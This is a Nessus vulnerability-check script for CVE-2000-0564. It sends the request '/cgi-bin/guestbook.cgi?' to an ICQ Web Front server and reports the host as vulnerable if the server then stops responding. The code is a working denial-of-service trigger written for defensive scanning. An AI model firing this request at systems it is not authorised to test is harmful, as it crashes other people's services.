#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#
#
if(description)
{
 script_id(10347);
 script_bugtraq_id(1463);
 script_cve_id("CVE-2000-0564");
 script_version ("$Revision: 1.16 $");
 
 name["english"] = "ICQ Denial of Service attack";
 script_name(english:name["english"]);
 
desc["english"] = "
Synopsis :

The remote host is prone to a denial of service attack.

Description :

The remote web server appears to be the ICQ Web Front service for ICQ.

An unauthenticated attacker can crash the version of ICQ Web Front 
installed on the remote host by connecting to it and sending a 
special request, '/cgi-bin/guestbook.cgi?'.

See also :

http://archives.neohapsis.com/archives/ntbugtraq/2000-q2/0218.html

Solution: 

Deactivate ICQ Web Front's web server service.

Risk factor : 

Low / CVSS Base Score : 2.7
(AV:R/AC:H/Au:NR/C:N/I:N/A:C/B:N)";
 script_description(english:desc["english"]);
 
 summary["english"] = "ICQ denial of service";
 script_summary(english:summary["english"]);
 
 script_category(ACT_DENIAL);
 
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison");
 family["english"] = "Denial of Service";
 script_family(english:family["english"]);
 script_require_ports(80, "Services/www");
 script_dependencies("find_service1.nasl");
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
port = get_http_port(default:80);


if (get_port_state(port))
{
  if(http_is_dead(port:port))exit(0);
  
  soc = http_open_socket(port);
  if(soc)
  {
    req = http_get(item:"/cgi-bin/guestbook.cgi?", port:port);
    send(socket:soc, data:req);
    r = http_recv(socket:soc);
    http_close_socket(soc);

   
    if(http_is_dead(port:port)) security_note(port);
  }
}

